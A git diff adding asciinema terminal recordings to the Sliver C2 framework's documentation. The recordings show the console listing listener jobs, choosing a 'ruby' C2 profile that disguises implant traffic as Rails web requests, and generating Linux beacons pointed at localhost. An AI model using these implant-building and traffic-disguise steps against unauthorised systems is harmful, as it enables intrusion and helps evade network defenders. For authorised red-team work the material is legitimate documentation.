+[44.328057, "o", "y"] +[45.019835, "o", "\u001b[1D\r\n\u001b[1B\u001b[0G\u001b[1A\u001b[0G"] +[45.03526, "o", "\u001b[0G\u001b[2K\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mRestart HTTP/S jobs? \u001b[0m\u001b[0;36mYes\u001b[0m\r\n"] +[45.05739, "o", "\r\u001b[2K\u001b[1m\u001b[31m[!] \u001b[0mJob #1 stopped (tcp/http)"] +[45.05942, "o", "\r\u001b[2K\u001b[1m\u001b[31m[!] \u001b[0mJob #1 stopped (tcp/http)"] +[45.114122, "o", "\r\n"] +[45.127711, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[45.129791, "o", "\u001b[1 q\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[45.130549, "o", "\u001b[6n"] +[45.13363, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[45.134555, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[46.627644, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[46.641586, "o", "j\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[46.643827, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[10D\u001b[9C\u001b[272D\u001b[10C\u001b[?25h"] +[46.815391, "o", "\u001b[?25l"] +[46.817358, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[46.834233, "o", "jo\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[11D\u001b[9C\u001b[272D\u001b[11C\u001b[?25h"] +[47.020359, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[47.023847, "o", "\u001b[6n"] +[47.035178, "o", "job\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[12D\u001b[9C"] +[47.035398, "o", "\u001b[272D\u001b[12C\u001b[?25h"] +[47.186485, "o", "\u001b[?25l"] +[47.202742, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[47.210579, "o", "\u001b[1m\u001b[32mjobs\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[47.211902, "o", "\u001b[272D\u001b[1A\u001b[13D\u001b[9C\u001b[272D\u001b[13C\u001b[?25h"] +[47.436803, "o", "\u001b[13D\u001b[9C"] +[47.438373, "o", "\u001b[6n"] +[47.44354, "o", "\u001b[272D\u001b[13C\u001b[0J\u001b[272D\r\r\n"] +[47.444708, "o", "\u001b[0 q\r\n"] +[47.472222, "o", " ID Name Protocol Port Domains \r\n==== ====== ========== ====== =========\r\n 3 http tcp 80 \r\n\r\n"] +[47.487801, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[47.488769, "o", "\u001b[1 q\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[47.493844, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[47.494852, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[48.939856, "o", "\u001b[?25l"] +[48.945319, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[48.958852, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[48.959329, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[10D\u001b[9C\u001b[272D\u001b[10C\u001b[?25h"] +[49.115651, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[49.128682, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[49.12958, "o", "\u001b[272D\u001b[1A\u001b[11D\u001b[9C\u001b[272D\u001b[11C\u001b[?25h"] +[49.287707, "o", "\u001b[?25l"] +[49.292955, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[49.30288, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[49.303432, "o", "\u001b[272D\u001b[1A\u001b[12D\u001b[9C\u001b[272D\u001b[12C\u001b[?25h"] +[49.485156, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[49.500361, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[49.504271, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[13D\u001b[9C\u001b[272D\u001b[13C\u001b[?25h"] +[50.263769, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[50.267739, "o", "\u001b[272D\u001b[13C\u001b[0J\u001b[272D\r\r\n"] +[50.269312, "o", "\u001b[0 q\r\n"] +[50.276245, "o", "Exiting...\r\n"] +[50.293761, "o", "# "] +[51.372846, "o", "^C"] +[51.379375, "o", "\r\n"] +[51.379682, "o", "# "] +[51.813502, "o", "\r\n"] diff --git a/docs/sliver-docs/public/asciinema/implant_custom_c2profile.cast b/docs/sliver-docs/public/asciinema/implant_custom_c2profile.cast new file mode 100644 index 0000000000..e77d871565 --- /dev/null +++ b/docs/sliver-docs/public/asciinema/implant_custom_c2profile.cast @@ -0,0 +1,444 @@ +{"version": 2, "width": 272, "height": 61, "timestamp": 1714659822, "env": {"SHELL": null, "TERM": "xterm"}} +[0.033615, "o", "# "] +[0.925283, "o", "."] +[0.997573, "o", "/"] +[1.322976, "o", "s"] +[1.430115, "o", "l"] +[1.49078, "o", "i"] +[1.590158, "o", "v"] +[1.775311, "o", "e"] +[1.85991, "o", "r"] +[2.003223, "o", "-"] +[2.15495, "o", "s"] +[2.196149, "o", "e"] +[2.240459, "o", "r"] +[2.481721, "o", "v"] +[2.727644, "o", "e"] +[2.808119, "o", "r"] +[2.870105, "o", "\r\n"] +[4.110367, "o", "\u001b[1m\u001b[37m\r\r\n.------..------..------..------..------..------.\r\r\n|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |\r\r\n| :/\\: || :/\\: || (\\/) || :(): || (\\/) || :(): |\r\r\n| :\\/: || (__) || :\\/: || ()() || :\\/: || ()() |\r\r\n| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|\r\r\n`------'`------'`------'`------'`------'`------'\r\r\n\u001b[0m\r\nAll hackers gain hexproof\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - ba3893980d1ca5e4ae4089eb4c87e9f5ba389119 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n"] +[4.116183, "o", "\r\n"] +[4.141337, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[4.143218, "o", "\u001b[1 q"] +[4.145126, "o", "\u001b[?25l"] +[4.145936, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[4.146639, "o", "\u001b[6n"] +[4.149524, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[4.149671, "o", "\r\r\n"] +[4.150924, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[4.706023, "o", "\u001b[?25l"] +[4.707226, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.722955, "o", "c\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[10D\u001b[9C\u001b[272D\u001b[10C\u001b[?25h"] +[4.961107, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.969484, "o", "c2\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[11D\u001b[9C\u001b[272D\u001b[11C\u001b[?25h"] +[5.225685, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.231229, "o", "\u001b[6n"] +[5.239478, "o", "c2p\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[5.240938, "o", "\u001b[272D\u001b[1A\u001b[12D\u001b[9C\u001b[272D\u001b[12C\u001b[?25h"] +[5.327491, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.329618, "o", "\u001b[6n"] +[5.340357, "o", "c2pr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[5.341538, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[13D\u001b[9C\u001b[272D\u001b[13C\u001b[?25h"] +[5.429764, "o", "\u001b[?25l"] +[5.43574, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.445255, "o", "c2pro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[14D"] +[5.446151, "o", "\u001b[9C\u001b[272D\u001b[14C\u001b[?25h"] +[5.571787, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.573494, "o", "\u001b[6n"] +[5.581764, "o", "c2prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[15D\u001b[9C\u001b[272D"] +[5.582092, "o", "\u001b[15C\u001b[?25h"] +[5.635235, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.646082, "o", "c2profi\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.646451, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[16D\u001b[9C\u001b[272D\u001b[16C\u001b[?25h"] +[5.719502, "o", "\u001b[?25l\u001b[272D"] +[5.723659, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.732539, "o", "c2profil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[5.732861, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[17D\u001b[9C\u001b[272D\u001b[17C\u001b[?25h"] +[5.791973, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.792431, "o", "\u001b[6n"] +[5.797553, "o", "c2profile\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[18D\u001b[9C\u001b[272D\u001b[18C\u001b[?25h"] +[5.834381, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.837028, "o", "\u001b[6n"] +[5.843722, "o", "\u001b[1m\u001b[32mc2profiles\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.845123, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[19D\u001b[9C\u001b[272D\u001b[19C\u001b[?25h"] +[6.190803, "o", "\u001b[19D\u001b[9C\u001b[6n"] +[6.208027, "o", "\u001b[272D\u001b[19C"] +[6.20841, "o", "\u001b[0J\u001b[272D\r\r\n"] +[6.212255, "o", "\u001b[0 q\r\n"] +[6.24707, "o", "\u001b7\u001b[?25l"] +[6.247424, "o", "\u001b8"] +[6.248805, "o", "\u001b[0G\u001b[2K"] +[6.261755, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a c2 profile\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> default\u001b[0m\r\n\u001b[0;39m ruby\u001b[0m\r\n\u001b7"] +[6.265079, "o", "\u001b[1A"] +[6.265183, "o", "\u001b[0G\u001b[1A\u001b[0G"] +[7.125742, "o", "\u001b8"] +[7.129658, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[7.136912, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a c2 profile\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;39m default\u001b[0m\r\n\u001b[0;1;36m> ruby\u001b[0m\r\n\u001b7\u001b[1A\u001b[0G"] +[7.571889, "o", "\u001b8\u001b[?25h\u001b8\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[7.57592, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a c2 profile\u001b[0m\u001b[0;36m ruby\u001b[0m\r\n"] +[7.628199, "o", " Parameter Value \r\n============================== =============================================================================================================================================================="] +[7.628402, "o", "====================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================\r\n Profile Name ruby "] +[7.628443, "o", " \r\n Server Headers "] +[7.629027, "o", " \r\n Server Cookies _session_id "] +[7.629257, "o", " \r\n Randomize Server Headers false \r\n Client Headers "] +[7.630761, "o", " \r\n Extra URL Parameters "] +[7.630871, "o", " \r\n User agent "] +[7.63098, "o", " \r\n Chrome base version 106 "] +[7.631025, "o", " \r\n MacOS version 10_15_7 \r\n Nonce query arg chars "] +[7.631078, "o", " abcdefghijklmnopqrstuvwxyz \r\n Max files 4 "] +[7.63121, "o", " \r\n Min files 2 "] +[7.631637, "o", " \r\n Max paths 4 "] +[7.631818, "o", " \r\n Min paths 2 "] +[7.63188, "o", " \r\n Stager file extension yml \r\n Start session file extension cgi "] +[7.631916, "o", " \r\n Session file extension erb "] +[7.631976, "o", " \r\n Poll file extension rdoc "] +[7.633173, "o", " \r\n Close file extension ico "] +[7.633834, "o", " \r\n Poll paths public,layouts,assets,views,log,stylesheets,vendor,rails,fixtures,app,process,home,lib,plugins,mailers,posts,tasks,db,cache,environments,doc,javascripts,test,controllers,initializers,images,info,script,config,user,performance,tmp,functional,integration,helpers,locales,models,1,unit "] +[7.633917, "o", " \r\n Poll files yetting,assets,stylesheets,webpacker-example,cable,sidekiq,jquery,422,prototype,browsing_test,mailers,sign_in,secret_token,secrets,admin_controller,javascripts,sidekiq-example,test,info,storage,request,benchmarker,edit,locales,profiler,inflections,runner,fixtures,500,process,application_helper,database,generate,new,boot,vue,environments,application,initializers,session_store,404,server,spawner,graphql,robots,functional,models,index,unit,mongoid,production,home,console,puma,reaper,tasks,application_controller,development,plugin,seeds,wrap_parameters,spring,controllers,environment,performance,routes,en,integration,inspector,test_helper,about,deploy,rails,mime_types,backtrace_silencers,mongoid-example,plugins,dbconsole,webpacker,cache,destroy,favicon,properties,README_FOR_APP,databas"] +[7.633958, "o", "e-example \r\n Session paths public,layouts,assets,views,log,stylesheets,vendor,rails,fixtures,app,process,home,lib,plugins,mailers,posts,tasks,db,cache,environments,doc,javascripts,test,controllers,initializers,images,info,script,config,user,performance,tmp,functional,integration,helpers,locales,models,1,unit \r\n Session files yetting,assets,stylesheets,webpacker-example,cable,sidekiq,jquery,422,prototype,browsing_test,mailers,sign_in,secret_token,secrets,admin_controll"] +[7.634, "o", "er,javascripts,sidekiq-example,test,info,storage,request,benchmarker,edit,locales,profiler,inflections,runner,fixtures,500,process,application_helper,database,generate,new,boot,vue,environments,application,initializers,session_store,404,server,spawner,graphql,robots,functional,models,index,unit,mongoid,production,home,console,puma,reaper,tasks,application_controller,development,plugin,seeds,wrap_parameters,spring,controllers,environment,performance,routes,en,integration,inspector,test_helper,about,deploy,rails,mime_types,backtrace_silencers,mongoid-example,plugins,dbconsole,webpacker,cache,destroy,favicon,properties,README_FOR_APP,database-example \r\n Close paths public,layouts,assets,views,log,stylesheets,vendor,rails,fixtures,app,process,home,lib,plugins,mailers,posts,tasks,db,cache,environments,doc,javascripts,test,controllers,initializers,images,info,script,config,user,performance,tmp,functional,integration,helpers,locales,models,1,unit "] +[7.634036, "o", " \r\n Close files yetting,assets,stylesheets,webpacker-example,cable,sidekiq,jquery,422,prototype,browsing_test,mailers,sign_in,secret_token,secrets,admin_controller,javascripts,sidekiq-example,test,info,storage,request,benchmarker,edit,locales,profiler,inflections,runner,fixtures,500,process,application_helper,database,generate,new,boot,vue,environments,application,initializers,session_store,404,server,spawner,graphql,robots,functional,models,index,unit,mongoid,production,home,console,puma,reaper,tasks,application_controller,developme"] +[7.634081, "o", "nt,plugin,seeds,wrap_parameters,spring,controllers,environment,performance,routes,en,integration,inspector,test_helper,about,deploy,rails,mime_types,backtrace_silencers,mongoid-example,plugins,dbconsole,webpacker,cache,destroy,favicon,properties,README_FOR_APP,database-example \r\n\r\n\r\n\r\n"] +[7.640853, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.640936, "o", "\u001b[1 q"] +[7.641667, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.643724, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.644093, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[10.007822, "o", "\u001b[1 q"] +[10.015416, "o", "\u001b[?25l"] +[10.016592, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.026336, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.028667, "o", "\u001b[1m\u001b[36mserver history (inc-search): \u001b[0m\u001b[1m\u001b[0m_\u001b[0K\r\r\n\u001b[0K\u001b[0m"] +[10.032364, "o", "\u001b[0K\u001b[m\u001b[2m313 \u001b[22mc2profiles\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m312 \u001b[22mexit\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m311 \u001b[22muse\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m310 \u001b[22mgenerate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m309 \u001b[22mc2profiles\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m308 \u001b[22mexit\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m307 \u001b[22mgenerate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m306 \u001b[22mc2profiles\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m305 \u001b[22mexit\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m304 \u001b"] +[10.033676, "o", "[22mjobs\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m303 \u001b[22mc2profiles import -f default_c2profile -n ruby -o\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m302 \u001b[22mc2profiles import -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m301 \u001b[22mexit\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m300 \u001b[22mc2profiles export -f default_c2profile\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m299 \u001b[22mc2profiles export -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m298 \u001b[22mexit\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m297 \u001b[22mc2profiles export -f default_c2profile\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m296 \u001b[22mc2profiles export -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m295 \u001b[22mexit\u001b[0m "] +[10.033871, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m294 \u001b[22mexot\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m293 \u001b[22mc2profiles export -n default -f default_c2profile\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m292 \u001b[22mc2profiles export -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m291 \u001b[22mexit\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m290 \u001b[22mc2profiles import -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m289 \u001b[22mc2profiles -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m288 \u001b[22mc2profiles\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m287 \u001b[22mls\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m286 \u001b[22mexit\u001b[0m "] +[10.033979, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m285 \u001b[22mc2profiles import -n ruby -f default_c2profile\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[2m\u001b[33m 2 more completion rows... (scroll down to show)\u001b[0m\u001b[0J\u001b[272D\u001b[29A\u001b[1A\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[10.459758, "o", "\u001b[?25l"] +[10.463043, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.473783, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.474247, "o", "\u001b[1m\u001b[36mserver history (inc-search): \u001b[0m\u001b[1mg\u001b[0m_\u001b[0K\r\r\n\u001b[0K\u001b[0m"] +[10.479025, "o", "\u001b[0K\u001b[48;05;255m\u001b[1;30m\u001b[2m310 \u001b[22mgenerate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m307 \u001b[22m\u001b[48;05;244mg\u001b[0m\u001b[menerate beacon -b localhost --skip-symbols --debu\u001b[48;05;244mg\u001b[0m\u001b[m --c2profile ruby --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m258 \u001b[22mprofiles \u001b[48;05;244mg\u001b[0m\u001b[menerate linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m253 \u001b[22mimplants rm CONTINUIN\u001b[48;05;244mG\u001b[0m\u001b[m_DOWNTOWN\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m247 \u001b[22mimplants sta\u001b[48;05;244mg\u001b[0m\u001b[me\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m245 \u001b[22mprofiles sta\u001b[48;05;244mg\u001b[0m\u001b[me linuxImplant -c deflate9\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m244 \u001b[22mprofiles sta\u001b[48;05;244mg\u001b[0m\u001b[me -h\u001b[0m "] +[10.480261, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m242 \u001b[22mprofiles sta\u001b[48;05;244mg\u001b[0m\u001b[me -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m240 \u001b[22mprofiles sta\u001b[48;05;244mg\u001b[0m\u001b[me -c zlib linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m239 \u001b[22mprofiles sta\u001b[48;05;244mg\u001b[0m\u001b[me -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m238 \u001b[22mprofiles \u001b[48;05;244mg\u001b[0m\u001b[menerate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m236 \u001b[22mprofiles \u001b[48;05;244mg\u001b[0m\u001b[menerate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m235 \u001b[22mprofiles sta\u001b[48;05;244mg\u001b[0m\u001b[me -c zlib\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m234 \u001b[22mprofiles sta\u001b[48;05;244mg\u001b[0m\u001b[me -h\u001b[0m "] +[10.481672, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m232 \u001b[22mprofiles sta\u001b[48;05;244mg\u001b[0m\u001b[me -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m231 \u001b[22mprofiles \u001b[48;05;244mg\u001b[0m\u001b[menerate linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m228 \u001b[22mprofiles new beacon -b localhost --debu\u001b[48;05;244mg\u001b[0m\u001b[m --skip-symbols --os linux linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m227 \u001b[22mprofiles new beacon -b localhost --debu\u001b[48;05;244mg\u001b[0m\u001b[m --skip-symbols --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m224 \u001b[22mprofiles \u001b[48;05;244mg\u001b[0m\u001b[menerate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m221 \u001b[22mprofiles \u001b[48;05;244mg\u001b[0m\u001b[menerate -h\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m219 \u001b[22mimplants sta\u001b[48;05;244mg\u001b[0m\u001b[me\u001b[0m "] +[10.483017, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m217 \u001b[22mimplants sta\u001b[48;05;244mg\u001b[0m\u001b[me\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m210 \u001b[22mimplants sta\u001b[48;05;244mg\u001b[0m\u001b[me\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m207 \u001b[22mimplants sta\u001b[48;05;244mg\u001b[0m\u001b[me\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m204 \u001b[22mprofiles \u001b[48;05;244mg\u001b[0m\u001b[menerate implant2\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m203 \u001b[22mimplants sta\u001b[48;05;244mg\u001b[0m\u001b[me\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m200 \u001b[22mprofiles new beacon -b localhost --os linux --debu\u001b[48;05;244mg\u001b[0m\u001b[m --skip-symbols --c2profile default implant2\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m194 \u001b[22mprofiles \u001b[48;05;244mg\u001b[0m\u001b[menerate implant1\u001b[0m "] +[10.483901, "o", " \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m192 \u001b[22mprofiles new -b localhost --os linux --debu\u001b[48;05;244mg\u001b[0m\u001b[m --skip-symbols --c2profile default implant1\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[2m\u001b[33m 2 more completion rows... (scroll down to show)\u001b[0m\u001b[0J\u001b[272D\u001b[29A\u001b[1A\u001b[1A\u001b[88D\u001b[9C\u001b[272D\u001b[88C\u001b[?25h"] +[10.628701, "o", "\u001b[?25l\u001b[272D"] +[10.630492, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.643229, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--c2profile \u001b[39m\u001b[22mruby \u001b[1m\u001b[38;05;244m--os \u001b[39m\u001b[22mlinux\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.643626, "o", "\u001b[1m\u001b[36mserver history (inc-search): \u001b[0m\u001b[1mge\u001b[0m_\u001b[0K\r\r\n\u001b[0K\u001b[0m"] +[10.647217, "o", "\u001b[0K\u001b[48;05;255m\u001b[1;30m\u001b[2m310 \u001b[22mgenerate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m307 \u001b[22m\u001b[48;05;244mge\u001b[0m\u001b[mnerate beacon -b localhost --skip-symbols --debug --c2profile ruby --os linux\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m258 \u001b[22mprofiles \u001b[48;05;244mge\u001b[0m\u001b[mnerate linuxImplant\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m247 \u001b[22mimplants sta\u001b[48;05;244mge\u001b[0m\u001b[m\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m245 \u001b[22mprofiles sta\u001b[48;05;244mge\u001b[0m\u001b[m linuxImplant -c deflate9\u001b[0m \u001b[0m\u001b[0K\r\r\n\u001b[m\u001b[2m244 \u001b[22mprofiles 